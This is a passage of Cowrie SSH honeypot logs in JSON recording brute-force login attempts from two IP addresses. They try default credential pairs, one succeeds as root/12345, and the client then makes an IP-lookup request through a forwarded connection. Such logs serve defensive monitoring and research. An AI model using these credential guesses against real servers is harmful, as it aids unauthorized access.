a2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:06:27.887158Z","src_ip":"103.217.145.104","session":"6b4ec90555d4"}
{"eventid":"cowrie.login.failed","username":"app","password":"123qwe","message":"login attempt [app/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:28.995749Z","src_ip":"103.217.145.104","session":"6b4ec90555d4"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:30.266685Z","src_ip":"103.217.145.104","session":"6b4ec90555d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43420,"dst_ip":"1.2.3.4","dst_port":22,"session":"74c73e8b01af","protocol":"ssh","message":"New connection: 212.227.235.229:43420 (1.2.3.4:22) [session: 74c73e8b01af]","sensor":"my-vps","timestamp":"2025-08-26T04:06:36.467221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:06:36.540011Z","src_ip":"212.227.235.229","session":"74c73e8b01af"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:06:36.804289Z","src_ip":"212.227.235.229","session":"74c73e8b01af"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:46.080444Z","src_ip":"212.227.235.229","session":"74c73e8b01af"}
{"eventid":"cowrie.session.closed","duration":"67.1","message":"Connection lost after 67.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:47.604130Z","src_ip":"212.227.235.229","session":"17bc4c56080e"}
{"eventid":"cowrie.session.closed","duration":"11.6","message":"Connection lost after 11.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:48.099837Z","src_ip":"212.227.235.229","session":"74c73e8b01af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52302,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdd112764bc2","protocol":"ssh","message":"New connection: 212.227.235.229:52302 (1.2.3.4:22) [session: fdd112764bc2]","sensor":"my-vps","timestamp":"2025-08-26T04:06:49.481673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:06:49.495556Z","src_ip":"212.227.235.229","session":"fdd112764bc2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:06:49.796382Z","src_ip":"212.227.235.229","session":"fdd112764bc2"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:50.941746Z","src_ip":"212.227.235.229","session":"fdd112764bc2"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:52.367649Z","src_ip":"212.227.235.229","session":"fdd112764bc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49668,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0ac0369b4e9","protocol":"ssh","message":"New connection: 212.227.235.229:49668 (1.2.3.4:22) [session: e0ac0369b4e9]","sensor":"my-vps","timestamp":"2025-08-26T04:06:59.969239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:06:59.970538Z","src_ip":"212.227.235.229","session":"e0ac0369b4e9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:00.320502Z","src_ip":"212.227.235.229","session":"e0ac0369b4e9"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:07:02.567462Z","src_ip":"212.227.235.229","session":"e0ac0369b4e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:07:02.990321Z","session":"e0ac0369b4e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:07:03.261983Z","src_ip":"212.227.235.229","session":"e0ac0369b4e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60070,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fdfa1526df1","protocol":"ssh","message":"New connection: 212.227.235.229:60070 (1.2.3.4:22) [session: 1fdfa1526df1]","sensor":"my-vps","timestamp":"2025-08-26T04:07:03.364382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:03.506648Z","src_ip":"212.227.235.229","session":"1fdfa1526df1"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:03.582322Z","src_ip":"212.227.235.229","session":"e0ac0369b4e9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:03.620186Z","src_ip":"212.227.235.229","session":"1fdfa1526df1"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:05.688301Z","src_ip":"212.227.235.229","session":"1fdfa1526df1"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:07.532449Z","src_ip":"212.227.235.229","session":"1fdfa1526df1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49684,"dst_ip":"1.2.3.4","dst_port":22,"session":"74418dd230e7","protocol":"ssh","message":"New connection: 212.227.235.229:49684 (1.2.3.4:22) [session: 74418dd230e7]","sensor":"my-vps","timestamp":"2025-08-26T04:07:07.576157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:07.637900Z","src_ip":"212.227.235.229","session":"74418dd230e7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:07.912690Z","src_ip":"212.227.235.229","session":"74418dd230e7"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:09.451589Z","src_ip":"212.227.235.229","session":"74418dd230e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54818,"dst_ip":"1.2.3.4","dst_port":22,"session":"93728aedb24c","protocol":"ssh","message":"New connection: 212.227.235.229:54818 (1.2.3.4:22) [session: 93728aedb24c]","sensor":"my-vps","timestamp":"2025-08-26T04:07:10.697336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:10.775137Z","src_ip":"212.227.235.229","session":"93728aedb24c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:10.944383Z","src_ip":"212.227.235.229","session":"93728aedb24c"}
